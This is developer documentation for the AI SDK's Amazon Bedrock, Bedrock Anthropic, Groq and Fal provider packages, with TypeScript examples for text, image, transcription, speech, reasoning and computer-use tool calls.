The following additional provider options are available for image editing:
- `taskType` string: Explicitly set the editing task type. Accepts `'TEXT_IMAGE'` (default for text-only), `'IMAGE_VARIATION'`, `'INPAINTING'`, `'OUTPAINTING'`, or `'BACKGROUND_REMOVAL'`. When images are provided without an explicit taskType, the model defaults to `'IMAGE_VARIATION'` (or `'INPAINTING'` if a mask is provided).
- `maskPrompt` string: Text description of the area to modify (for inpainting/outpainting). Alternative to providing a mask image.
- `similarityStrength` number: For `IMAGE_VARIATION`: Controls similarity to the original (0-1).
- `outPaintingMode` string: For `OUTPAINTING`: Controls the outpainting behavior (`'DEFAULT'` or `'PRECISE'`).
Image Model Settings
You can customize the generation behavior with optional settings:
await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: 'A beautiful sunset over a calm ocean',
size: '512x512',
seed: 42,
maxImagesPerCall: 1, // Maximum number of images to generate per API call
});
- `maxImagesPerCall` number: Override the maximum number of images generated per API call. Default can vary by model, with 5 as a common default.
Model Capabilities
The Amazon Nova Canvas model supports custom sizes with constraints as follows:
- Each side must be between 320-4096 pixels, inclusive.
- Each side must be evenly divisible by 16.
- The aspect ratio must be between 1:4 and 4:1. That is, one side can't be more than 4 times longer than the other side.
- The total pixel count must be less than 4,194,304.
For more, see Image generation access and usage.
| Model | Sizes |
|---|---|
| amazon.nova-canvas-v1:0 | Custom sizes: 320-4096px per side (must be divisible by 16), aspect ratio 1:4 to 4:1, max 4.2M pixels |
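To make these constraints concrete, here is a minimal sketch of a size check you could run before calling generateImage (the helper name is ours, not part of the SDK):

```ts
// Hypothetical helper: checks a size against the Nova Canvas constraints above.
function isValidNovaCanvasSize(width: number, height: number): boolean {
  const inRange = (side: number) => side >= 320 && side <= 4096;
  const divisibleBy16 = (side: number) => side % 16 === 0;
  const ratio = width / height;
  return (
    inRange(width) &&
    inRange(height) &&
    divisibleBy16(width) &&
    divisibleBy16(height) &&
    ratio >= 1 / 4 &&
    ratio <= 4 &&
    width * height < 4_194_304
  );
}

console.log(isValidNovaCanvasSize(512, 512)); // true
console.log(isValidNovaCanvasSize(320, 2048)); // false: aspect ratio exceeds 1:4
```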
Response Headers
The Amazon Bedrock provider will return the response headers associated with network requests made to the Bedrock servers.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const result = await generateText({
model: bedrock('meta.llama3-70b-instruct-v1:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
console.log(result.response.headers);
Below is sample output where you can see the x-amzn-requestid header. This can
be useful for correlating Bedrock API calls with requests made by the AI SDK:
{
connection: 'keep-alive',
'content-length': '2399',
'content-type': 'application/json',
date: 'Fri, 07 Feb 2025 04:28:30 GMT',
'x-amzn-requestid': 'c9f3ace4-dd5d-49e5-9807-39aedfa47c8e'
}
This information is also available with streamText:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';
const result = streamText({
model: bedrock('meta.llama3-70b-instruct-v1:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log('Response headers:', (await result.response).headers);
With sample output as:
{
connection: 'keep-alive',
'content-type': 'application/vnd.amazon.eventstream',
date: 'Fri, 07 Feb 2025 04:33:37 GMT',
'transfer-encoding': 'chunked',
'x-amzn-requestid': 'a976e3fc-0e45-4241-9954-b9bdd80ab407'
}
Bedrock Anthropic Provider Usage
The Bedrock Anthropic provider offers support for Anthropic's Claude models through Amazon Bedrock's native InvokeModel API. This provides full feature parity with the Anthropic API, including features that may not be available through the Converse API (such as stop_sequence in streaming responses).
For more information on Claude models available on Amazon Bedrock, see Claude on Amazon Bedrock.
Provider Instance
You can import the default provider instance bedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic:
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
If you need a customized setup, you can import createBedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic and create a provider instance with your settings:
import { createBedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
const bedrockAnthropic = createBedrockAnthropic({
region: 'us-east-1', // optional
accessKeyId: 'xxxxxxxxx', // optional
secretAccessKey: 'xxxxxxxxx', // optional
sessionToken: 'xxxxxxxxx', // optional
});
Provider Settings
You can use the following optional settings to customize the Bedrock Anthropic provider instance:
- `region` string: The AWS region that you want to use for the API calls. It uses the `AWS_REGION` environment variable by default.
- `accessKeyId` string: The AWS access key ID that you want to use for the API calls. It uses the `AWS_ACCESS_KEY_ID` environment variable by default.
- `secretAccessKey` string: The AWS secret access key that you want to use for the API calls. It uses the `AWS_SECRET_ACCESS_KEY` environment variable by default.
- `sessionToken` string: Optional. The AWS session token that you want to use for the API calls. It uses the `AWS_SESSION_TOKEN` environment variable by default.
- `apiKey` string: API key for authenticating requests using Bearer token authentication. When provided, this will be used instead of AWS SigV4 authentication. It uses the `AWS_BEARER_TOKEN_BEDROCK` environment variable by default.
- `baseURL` string: Base URL for the Bedrock API calls. Useful for custom endpoints or proxy configurations.
- `headers` Resolvable<Record<string, string | undefined>>: Headers to include in the requests.
- `fetch` (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- `credentialProvider` () => PromiseLike<BedrockCredentials>: The AWS credential provider to use for the Bedrock provider to get dynamic credentials similar to the AWS SDK. Setting a provider here will cause its credential values to be used instead of the `accessKeyId`, `secretAccessKey`, and `sessionToken` settings.
Language Models
You can create models that call the Anthropic Messages API using the provider instance.
The first argument is the model id, e.g. us.anthropic.claude-3-5-sonnet-20241022-v2:0.
const model = bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0');
You can use Bedrock Anthropic language models to generate text with the generateText function:
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Provider Options
The following optional provider options are available for Bedrock Anthropic models:
- `metadata` object: Optional. Metadata to include with the request. See the Anthropic API documentation for details.
  - `userId` string: An external identifier for the end-user.
Cache Control
In the messages and message parts, you can use the providerOptions property to set cache control breakpoints.
You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
messages: [
{
role: 'system',
content: 'You are an expert assistant.',
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{
role: 'user',
content: 'Explain quantum computing.',
},
],
});
Computer Use
The Bedrock Anthropic provider supports Anthropic's computer use tools:
- Bash Tool: Allows running bash commands.
- Text Editor Tool: Provides functionality for viewing and editing text files.
- Computer Tool: Enables control of keyboard and mouse actions on a computer.
They are available via the tools property of the provider instance.
Bash Tool
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
tools: {
bash: bedrockAnthropic.tools.bash_20241022({
execute: async ({ command }) => {
// Implement your bash command execution logic here
return [{ type: 'text', text: `Executed: ${command}` }];
},
}),
},
prompt: 'List the files in my directory.',
stopWhen: stepCountIs(2),
});
Text Editor Tool
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
tools: {
str_replace_editor: bedrockAnthropic.tools.textEditor_20241022({
execute: async ({ command, path, old_str, new_str, insert_text }) => {
// Implement your text editing logic here
return 'File updated successfully';
},
}),
},
prompt: 'Update my README file.',
stopWhen: stepCountIs(5),
});
Computer Tool
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';
import fs from 'fs';
const result = await generateText({
model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
tools: {
computer: bedrockAnthropic.tools.computer_20241022({
displayWidthPx: 1024,
displayHeightPx: 768,
execute: async ({ action, coordinate, text }) => {
if (action === 'screenshot') {
return {
type: 'image',
data: fs.readFileSync('./screenshot.png').toString('base64'),
};
}
return `executed ${action}`;
},
toModelOutput({ output }) {
return {
type: 'content',
value: [
typeof output === 'string'
? { type: 'text', text: output }
: {
type: 'image-data',
data: output.data,
mediaType: 'image/png',
},
],
};
},
}),
},
prompt: 'Take a screenshot.',
stopWhen: stepCountIs(3),
});
Reasoning
Anthropic has reasoning support for Claude 3.7 and Claude 4 models on Bedrock, including:
- `us.anthropic.claude-opus-4-7`
- `us.anthropic.claude-opus-4-6-v1`
- `us.anthropic.claude-opus-4-5-20251101-v1:0`
- `us.anthropic.claude-sonnet-4-5-20250929-v1:0`
- `us.anthropic.claude-opus-4-20250514-v1:0`
- `us.anthropic.claude-sonnet-4-20250514-v1:0`
- `us.anthropic.claude-opus-4-1-20250805-v1:0`
- `us.anthropic.claude-haiku-4-5-20251001-v1:0`
You can enable it using the thinking provider option and specifying a thinking budget in tokens.
import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
},
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Computer Use | Reasoning |
|---|---|---|---|---|---|
| us.anthropic.claude-opus-4-7 | | | | | |
| us.anthropic.claude-opus-4-6-v1 | | | | | |
| us.anthropic.claude-opus-4-5-20251101-v1:0 | | | | | |
| us.anthropic.claude-sonnet-4-5-20250929-v1:0 | | | | | |
| us.anthropic.claude-opus-4-20250514-v1:0 | | | | | |
| us.anthropic.claude-sonnet-4-20250514-v1:0 | | | | | |
| us.anthropic.claude-opus-4-1-20250805-v1:0 | | | | | |
| us.anthropic.claude-haiku-4-5-20251001-v1:0 | | | | | |
| us.anthropic.claude-3-5-sonnet-20241022-v2:0 | | | | | |
Migrating to @ai-sdk/amazon-bedrock 2.x
The Amazon Bedrock provider was rewritten in version 2.x to remove the
dependency on the @aws-sdk/client-bedrock-runtime package.
The bedrockOptions provider setting previously available has been removed. If
you were using the bedrockOptions object, you should now use the region,
accessKeyId, secretAccessKey, and sessionToken settings directly instead.
Note that you may need to set all of these explicitly, e.g. even if you're not
using sessionToken, set it to undefined. If you're running in a serverless
environment, there may be default environment variables set by your containing
environment that the Amazon Bedrock provider will then pick up and could
conflict with the ones you're intending to use.
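A minimal before/after sketch of this migration (credential values are placeholders):

```ts
import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';

// Before (1.x): client options were nested under bedrockOptions.
// const bedrock = createAmazonBedrock({
//   bedrockOptions: { /* @aws-sdk/client-bedrock-runtime options */ },
// });

// After (2.x): pass region and credentials directly. Set unused
// credentials explicitly to undefined so that environment defaults
// from your runtime cannot conflict with them.
const bedrock = createAmazonBedrock({
  region: 'us-east-1',
  accessKeyId: 'xxxxxxxxx',
  secretAccessKey: 'xxxxxxxxx',
  sessionToken: undefined,
});
```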
---
title: Groq
description: Learn how to use Groq.
---
Groq Provider
The Groq provider contains language model support for the Groq API.
Setup
The Groq provider is available via the @ai-sdk/groq module.
You can install it with
pnpm add @ai-sdk/groq
Provider Instance
You can import the default provider instance groq from @ai-sdk/groq:
import { groq } from '@ai-sdk/groq';
If you need a customized setup, you can import createGroq from @ai-sdk/groq
and create a provider instance with your settings:
import { createGroq } from '@ai-sdk/groq';
const groq = createGroq({
// custom settings
});
You can use the following optional settings to customize the Groq provider instance:
- `baseURL` string: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://api.groq.com/openai/v1`.
- `apiKey` string: API key that is sent using the `Authorization` header. It defaults to the `GROQ_API_KEY` environment variable.
- `headers` Record<string,string>: Custom headers to include in the requests.
- `fetch` (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create Groq models using a provider instance.
The first argument is the model id, e.g. gemma2-9b-it.
const model = groq('gemma2-9b-it');
Reasoning Models
Groq offers several reasoning models such as qwen-qwq-32b and deepseek-r1-distill-llama-70b.
You can configure how the reasoning is exposed in the generated text by using the reasoningFormat option.
It supports the options parsed, hidden, and raw.
import { groq, type GroqLanguageModelOptions } from '@ai-sdk/groq';
import { generateText } from 'ai';
const result = await generateText({
model: groq('qwen/qwen3-32b'),
providerOptions: {
groq: {
reasoningFormat: 'parsed',
reasoningEffort: 'default',
parallelToolCalls: true, // Enable parallel function calling (default: true)
user: 'user-123', // Unique identifier for end-user (optional)
serviceTier: 'flex', // Use flex tier for higher throughput (optional)
} satisfies GroqLanguageModelOptions,
},
prompt: 'How many "r"s are in the word "strawberry"?',
});
The following optional provider options are available for Groq language models:

- `reasoningFormat` 'parsed' | 'raw' | 'hidden': Controls how reasoning is exposed in the generated text. Only supported by reasoning models like `qwen-qwq-32b` and `deepseek-r1-distill-*` models. For a complete list of reasoning models and their capabilities, see Groq's reasoning models documentation.
- `reasoningEffort` 'low' | 'medium' | 'high' | 'none' | 'default': Controls the level of effort the model will put into reasoning.
  - `qwen/qwen3-32b` supports `none` (disable reasoning; the model will not use any reasoning tokens) and `default` (enable reasoning). Defaults to `default` for `qwen/qwen3-32b`.
  - `gpt-oss-20b` / `gpt-oss-120b` support `low`, `medium`, and `high` levels of reasoning effort.
- `structuredOutputs` boolean: Whether to use structured outputs. Defaults to `true`. When enabled, object generation will use the `json_schema` format instead of the `json_object` format, providing more reliable structured outputs.
- `strictJsonSchema` boolean: Whether to use strict JSON schema validation. When `true`, the model uses constrained decoding to guarantee schema compliance. Defaults to `true`. Only used when `structuredOutputs` is enabled and a schema is provided. See Groq's Structured Outputs documentation for details on strict mode limitations.
- `parallelToolCalls` boolean: Whether to enable parallel function calling during tool use. Defaults to `true`.
- `user` string: A unique identifier representing your end-user, which can help with monitoring and abuse detection.
- `serviceTier` 'on_demand' | 'performance' | 'flex' | 'auto': Service tier for the request. Defaults to `'on_demand'`.
  - `'on_demand'`: Default tier with consistent performance and fairness.
  - `'performance'`: Prioritized tier for latency-sensitive workloads.
  - `'flex'`: Higher throughput tier (10x rate limits) optimized for workloads that can handle occasional request failures.
  - `'auto'`: Uses on_demand rate limits first, then falls back to the flex tier if exceeded.

For more details about service tiers and their benefits, see Groq's service tiers documentation.

Only Groq reasoning models support the reasoningFormat option.
Structured Outputs
Structured outputs are enabled by default for Groq models.
You can disable them by setting the structuredOutputs option to false.
import { groq } from '@ai-sdk/groq';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: groq('moonshotai/kimi-k2-instruct-0905'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.string()),
instructions: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a simple pasta recipe.',
});
console.log(JSON.stringify(result.output, null, 2));
You can disable structured outputs for models that don't support them:
import { groq, type GroqLanguageModelOptions } from '@ai-sdk/groq';
import { generateText, Output } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: groq('gemma2-9b-it'),
providerOptions: {
groq: {
structuredOutputs: false,
} satisfies GroqLanguageModelOptions,
},
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.string()),
instructions: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a simple pasta recipe in JSON format.',
});
console.log(JSON.stringify(result.output, null, 2));
Example
You can use Groq language models to generate text with the generateText function:
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const { text } = await generateText({
model: groq('gemma2-9b-it'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Image Input
Groq's multi-modal models like meta-llama/llama-4-scout-17b-16e-instruct support image inputs. You can include images in your messages using either URLs or base64-encoded data:
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const { text } = await generateText({
model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'What do you see in this image?' },
{
type: 'image',
image: 'https://example.com/image.jpg',
},
],
},
],
});
You can also use base64-encoded images:
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
import { readFileSync } from 'fs';
const imageData = readFileSync('path/to/image.jpg', 'base64');
const { text } = await generateText({
model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe this image in detail.' },
{
type: 'image',
image: `data:image/jpeg;base64,${imageData}`,
},
],
},
],
});
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| gemma2-9b-it | | | | |
| llama-3.1-8b-instant | | | | |
| llama-3.3-70b-versatile | | | | |
| meta-llama/llama-guard-4-12b | | | | |
| deepseek-r1-distill-llama-70b | | | | |
| meta-llama/llama-4-maverick-17b-128e-instruct | | | | |
| meta-llama/llama-4-scout-17b-16e-instruct | | | | |
| meta-llama/llama-prompt-guard-2-22m | | | | |
| meta-llama/llama-prompt-guard-2-86m | | | | |
| moonshotai/kimi-k2-instruct-0905 | | | | |
| qwen/qwen3-32b | | | | |
| llama-guard-3-8b | | | | |
| llama3-70b-8192 | | | | |
| llama3-8b-8192 | | | | |
| mixtral-8x7b-32768 | | | | |
| qwen-qwq-32b | | | | |
| qwen-2.5-32b | | | | |
| deepseek-r1-distill-qwen-32b | | | | |
| openai/gpt-oss-20b | | | | |
| openai/gpt-oss-120b | | | | |
Browser Search Tool
Groq provides a browser search tool that offers interactive web browsing capabilities. Unlike traditional web search, browser search navigates websites interactively, providing more detailed and comprehensive results.
Supported Models
Browser search is only available for these specific models:
- `openai/gpt-oss-20b`
- `openai/gpt-oss-120b`
Basic Usage
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const result = await generateText({
model: groq('openai/gpt-oss-120b'), // Must use supported model
prompt:
'What are the latest developments in AI? Please search for recent news.',
tools: {
browser_search: groq.tools.browserSearch({}),
},
toolChoice: 'required', // Ensure the tool is used
});
console.log(result.text);
Streaming Example
import { groq } from '@ai-sdk/groq';
import { streamText } from 'ai';
const result = streamText({
model: groq('openai/gpt-oss-120b'),
prompt: 'Search for the latest tech news and summarize it.',
tools: {
browser_search: groq.tools.browserSearch({}),
},
toolChoice: 'required',
});
for await (const delta of result.fullStream) {
if (delta.type === 'text-delta') {
process.stdout.write(delta.text);
}
}
Key Features
- Interactive Browsing: Navigates websites like a human user
- Comprehensive Results: More detailed than traditional search snippets
- Server-side Execution: Runs on Groq's infrastructure, no setup required
- Powered by Exa: Uses Exa search engine for optimal results
- Currently Free: Available at no additional charge during beta
Best Practices
- Use `toolChoice: 'required'` to ensure the browser search is activated
- Only supported on `openai/gpt-oss-20b` and `openai/gpt-oss-120b` models
- The tool works automatically, with no configuration parameters needed
- Server-side execution means no additional API keys or setup required
Model Validation
The provider automatically validates model compatibility:
// ✅ Supported - will work
const supported = await generateText({
  model: groq('openai/gpt-oss-120b'),
  tools: { browser_search: groq.tools.browserSearch({}) },
});

// ❌ Unsupported - will show warning and ignore tool
const unsupported = await generateText({
  model: groq('gemma2-9b-it'),
  tools: { browser_search: groq.tools.browserSearch({}) },
});
// Warning: "Browser search is only supported on models: openai/gpt-oss-20b, openai/gpt-oss-120b"
Transcription Models
You can create models that call the Groq transcription API
using the .transcription() factory method.
The first argument is the model id, e.g. `whisper-large-v3`.
const model = groq.transcription('whisper-large-v3');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { groq, type GroqTranscriptionModelOptions } from '@ai-sdk/groq';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: groq.transcription('whisper-large-v3'),
audio: await readFile('audio.mp3'),
providerOptions: {
groq: { language: 'en' } satisfies GroqTranscriptionModelOptions,
},
});
The following provider options are available:
- `timestampGranularities` string[]: The granularity of the timestamps in the transcription. Defaults to `['segment']`. Possible values are `['word']`, `['segment']`, and `['word', 'segment']`. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency. Important: Requires `responseFormat` to be set to `'verbose_json'`.
- `responseFormat` string: The format of the response. Set to `'verbose_json'` to receive timestamps for audio segments and enable `timestampGranularities`. Set to `'text'` to return only the transcribed text. Optional.
- `language` string: The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. `'en'`) will improve accuracy and latency. Optional.
- `prompt` string: An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
- `temperature` number: The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
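For example, to request word-level timestamps (a minimal sketch; note that this requires the verbose_json response format, per the options above):

```ts
import { experimental_transcribe as transcribe } from 'ai';
import { groq, type GroqTranscriptionModelOptions } from '@ai-sdk/groq';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: groq.transcription('whisper-large-v3'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    groq: {
      // Word timestamps require the verbose_json response format.
      responseFormat: 'verbose_json',
      timestampGranularities: ['word', 'segment'],
    } satisfies GroqTranscriptionModelOptions,
  },
});

console.log(result.text);
console.log(result.segments); // timestamped segments
```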
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper-large-v3 | | | | |
| whisper-large-v3-turbo | | | | |
---
title: Fal
description: Learn how to use Fal AI models with the AI SDK.
---
Fal Provider
Fal AI provides a generative media platform for developers with lightning-fast inference capabilities. Their platform offers optimized performance for running diffusion models, with speeds up to 4x faster than alternatives.
Setup
The Fal provider is available via the @ai-sdk/fal module. You can install it with
pnpm add @ai-sdk/fal
Provider Instance
You can import the default provider instance fal from @ai-sdk/fal:
import { fal } from '@ai-sdk/fal';
If you need a customized setup, you can import createFal and create a provider instance with your settings:
import { createFal } from '@ai-sdk/fal';
const fal = createFal({
apiKey: 'your-api-key', // optional, defaults to FAL_API_KEY environment variable, falling back to FAL_KEY
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Fal provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://fal.run.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the FAL_API_KEY environment variable, falling back to FAL_KEY.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
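The fetch setting can act as lightweight middleware. A minimal sketch (the logging behavior is illustrative, not part of the provider):
import { createFal } from '@ai-sdk/fal';
const falWithLogging = createFal({
  fetch: async (input, init) => {
    // log each outgoing request, then delegate to the global fetch
    console.log('Fal request:', String(input));
    return fetch(input, init);
  },
});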
Image Models
You can create Fal image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { fal } from '@ai-sdk/fal';
import { generateImage } from 'ai';
import fs from 'fs';
const { image, providerMetadata } = await generateImage({
model: fal.image('fal-ai/flux/dev'),
prompt: 'A serene mountain landscape at sunset',
});
const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Fal image models may return additional information for the images and the request.
Here are some examples of properties that may be set for each image:
providerMetadata.fal.images[0].nsfw; // boolean, image is not safe for work
providerMetadata.fal.images[0].width; // number, image width
providerMetadata.fal.images[0].height; // number, image height
providerMetadata.fal.images[0].contentType; // string, mime type of the image
Model Capabilities
Fal offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Fal AI Search Page.
| Model | Description |
|---|---|
| fal-ai/flux/dev | FLUX.1 [dev] model for high-quality image generation |
| fal-ai/flux-pro/kontext | FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations |
| fal-ai/flux-pro/kontext/max | FLUX.1 Kontext [max] with improved prompt adherence and typography generation |
| fal-ai/flux-lora | Super fast endpoint for FLUX.1 with LoRA support |
| fal-ai/ideogram/character | Generate consistent character appearances across multiple images. Maintain facial features, proportions, and distinctive traits |
| fal-ai/qwen-image | Qwen-Image foundation model with significant advances in complex text rendering and precise image editing |
| fal-ai/omnigen-v2 | Unified image generation model for Image Editing, Personalized Image Generation, Virtual Try-On, Multi Person Generation and more |
| fal-ai/bytedance/dreamina/v3.1/text-to-image | Dreamina showcases superior picture effects with improvements in aesthetics, precise and diverse styles, and rich details |
| fal-ai/recraft/v3/text-to-image | SOTA in image generation with vector art and brand style capabilities |
| fal-ai/wan/v2.2-a14b/text-to-image | High-resolution, photorealistic images with fine-grained detail |
Fal models support the following aspect ratios:
- 1:1 (square HD)
- 16:9 (landscape)
- 9:16 (portrait)
- 4:3 (landscape)
- 3:4 (portrait)
- 16:10 (1280x800)
- 10:16 (800x1280)
- 21:9 (2560x1080)
- 9:21 (1080x2560)
Key features of Fal models include:
- Up to 4x faster inference speeds compared to alternatives
- Optimized by the Fal Inference Engine™
- Support for real-time infrastructure
- Cost-effective scaling with pay-per-use pricing
- LoRA training capabilities for model personalization
Modify Image
Transform existing images using text prompts.
await generateImage({
model: fal.image('fal-ai/flux-pro/kontext/max'),
prompt: {
text: 'Put a donut next to the flour.',
images: [
'https://v3.fal.media/files/rabbit/rmgBxhwGYb2d3pl3x9sKf_output.png',
],
},
});
Images can also be passed as a base64-encoded string, a Uint8Array, an ArrayBuffer, or a Buffer.
A mask can be passed as well:
await generateImage({
model: fal.image('fal-ai/flux-pro/kontext/max'),
prompt: {
text: 'Put a donut next to the flour.',
images: [imageBuffer],
mask: maskBuffer,
},
});
Provider Options
Fal image models support flexible provider options through the providerOptions.fal object. You can pass any parameters supported by the specific Fal model's API. Common options include:
- imageUrl - Reference image URL for image-to-image generation (deprecated, use prompt.images instead)
- strength - Controls how much the output differs from the input image
- guidanceScale - Controls adherence to the prompt (range: 1-20)
- numInferenceSteps - Number of denoising steps (range: 1-50)
- enableSafetyChecker - Enable/disable safety filtering
- outputFormat - Output format: 'jpeg' or 'png'
- syncMode - Wait for completion before returning response
- acceleration - Speed of generation: 'none', 'regular', or 'high'
- safetyTolerance - Content safety filtering level (1-6, where 1 is strictest)
- useMultipleImages - When true, converts multiple input images to an image_urls array for models that support multiple images (e.g., fal-ai/flux-2/edit)
Refer to the Fal AI model documentation for model-specific parameters.
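For example, a minimal sketch combining a few of the common options above (the values are illustrative, not recommendations):
import { fal } from '@ai-sdk/fal';
import { generateImage } from 'ai';
const { image } = await generateImage({
  model: fal.image('fal-ai/flux/dev'),
  prompt: 'A serene mountain landscape at sunset',
  providerOptions: {
    fal: {
      numInferenceSteps: 28, // denoising steps (1-50)
      guidanceScale: 3.5, // prompt adherence (1-20)
      outputFormat: 'png',
    },
  },
});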
Advanced Features
Fal's platform offers several advanced capabilities:
- Private Model Inference: Run your own diffusion transformer models with up to 50% faster inference
- LoRA Training: Train and personalize models in under 5 minutes
- Real-time Infrastructure: Enable new user experiences with fast inference times
- Scalable Architecture: Scale to thousands of GPUs when needed
For more details about Fal's capabilities and features, visit the Fal AI documentation.
Transcription Models
You can create models that call the Fal transcription API
using the .transcription() factory method.
The first argument is the model id without the fal-ai/ prefix e.g. wizper.
const model = fal.transcription('wizper');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the batchSize option will increase the number of audio chunks processed in parallel.
import { experimental_transcribe as transcribe } from 'ai';
import { fal, type FalTranscriptionModelOptions } from '@ai-sdk/fal';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: fal.transcription('wizper'),
audio: await readFile('audio.mp3'),
providerOptions: {
fal: { batchSize: 10 } satisfies FalTranscriptionModelOptions,
},
});
The following provider options are available:
- language string - Language of the audio file. Defaults to 'en'. If set to null, the language will be automatically detected. Accepts ISO language codes like 'en', 'fr', 'zh', etc. Optional.
- diarize boolean - Whether to diarize the audio file (identify different speakers). Defaults to true. Optional.
- chunkLevel string - Level of the chunks to return. Either 'segment' or 'word'. Default value: "segment". Optional.
- version string - Version of the model to use. All models are Whisper large variants. Default value: "3". Optional.
- batchSize number - Batch size for processing. Default value: 64. Optional.
- numSpeakers number - Number of speakers in the audio file. If not provided, the number of speakers will be automatically detected. Optional.
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper | | | | |
| wizper | | | | |
Speech Models
You can create models that call Fal text-to-speech endpoints using the .speech() factory method.
Basic Usage
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { fal } from '@ai-sdk/fal';
const result = await generateSpeech({
model: fal.speech('fal-ai/minimax/speech-02-hd'),
text: 'Hello from the AI SDK!',
});
Model Capabilities
| Model | Description |
|---|---|
| fal-ai/minimax/voice-clone | Clone a voice from a sample audio and generate speech from text prompts |
| fal-ai/minimax/voice-design | Design a personalized voice from a text description and generate speech from text prompts |
| fal-ai/dia-tts/voice-clone | Clone dialog voices from a sample audio and generate dialogs from text prompts |
| fal-ai/minimax/speech-02-hd | Generate speech from text prompts and different voices |
